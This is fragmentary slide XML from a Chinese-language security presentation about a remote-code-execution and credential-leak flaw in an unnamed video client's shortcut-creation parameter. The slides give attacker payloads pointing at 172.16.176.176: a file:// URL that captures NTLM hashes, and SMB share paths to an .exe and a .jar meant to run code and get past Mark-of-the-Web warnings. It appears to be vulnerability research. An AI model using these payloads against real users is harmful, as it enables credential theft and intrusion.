                </a:rPr>
                <a:t>Player.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> \</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>UrlQuickLunch</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>=http://www.baidu.com,0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>也就</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>表示</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的值回带入到快捷方式的目标中，</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>name</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的值回变成快捷方式的名字。</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en"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10798BB5-7F51-60D0-2BF2-F0751756E3A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="333768" y="3429000"/>
              <a:ext cx="6461111" cy="2500361"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="图片 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A117761-9EEF-3FC6-2D31-4B73D859E1FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7207944" y="3416416"/>
              <a:ext cx="4411971" cy="2512945"/>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4041088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某视频软件客户端</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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B4F4B3-FBD4-B169-F163-3BEFD62BF67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="463649" y="1702012"/>
            <a:ext cx="11264703" cy="4452031"/>
            <a:chOff x="355997" y="1785513"/>
            <a:chExt cx="11607403" cy="4587473"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2652E68-A7E3-7188-B781-7780B344D22D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="355997" y="1908624"/>
              <a:ext cx="6230470" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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当我们双击这个快捷方式时，就会调用浏览器打开</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>www.baidu.com</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>。经过验证</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>参数</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>值必须为</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>URL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>相似</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>格式</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，因此我们可以使用</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>file://172.16.176.176/netntlm</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>代入</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>，当打开创建的快捷方式即可获取</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>NTLM</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Hash</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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B0F7229F-4457-F857-8139-F5EFA45F803C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="355997" y="3094369"/>
              <a:ext cx="6230470" cy="3235052"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="图片 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB181FC-1050-A3AE-CF8A-28FEB4E5DE50}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6769847" y="3137934"/>
              <a:ext cx="5193553" cy="3235052"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45EE24EB-A774-D568-6FC6-67A6AFE43052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6716059" y="1785513"/>
              <a:ext cx="5247341" cy="1323439"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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除了获取</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>NTLM Hash</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="e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我们还可以在</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Ubuntu</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>上开一个</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>SMB</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>服务，然后将</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>参数设为</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>\\172.16.176.176\</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>share\</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Test.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="e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使用快捷方式打开共享文件，发现确实可以打开</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>EXE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>文件，但是会有文件信任的安全警告（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Mark-of-the-Web</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en"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792065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某视频软件客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" charset="-122"/>
              <a:cs typeface="Microsoft YaHei" charset="-122"/>
            </a:endParaRP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A3C3B92B-7E42-033A-5E3B-BCB2AEBC7AD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="553451" y="1719965"/>
            <a:ext cx="11085098" cy="4434070"/>
            <a:chOff x="495061" y="1806157"/>
            <a:chExt cx="11273593" cy="4509469"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文本框 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDC30996-2107-9B9F-39E2-451DAE462795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="495061" y="1806157"/>
              <a:ext cx="5089950" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr kumimoji="1" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>可以通过jar文件形式去绕过，打包一个打开计算器的Jar包放在共享目录下，然后将url参数设为\\172.16.176.176\share\1.jar。但是这样有局限性，对方没有</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>JDK</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>环境就无法运行。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09ADA513-3917-B3E0-C7F3-045A39E16C0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect b="22864"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="562296" y="3177714"/>
              <a:ext cx="4939553" cy="2420472"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="图片 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F154C8B7-97C6-5861-003E-4E54F989111D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5903786" y="3895154"/>
              <a:ext cx="5812318" cy="2420472"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023D85F9-95D0-80B8-8905-E72668197290}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5851237" y="1806157"/>
              <a:ext cx="5917417" cy="2062103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr kumimoji="1" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
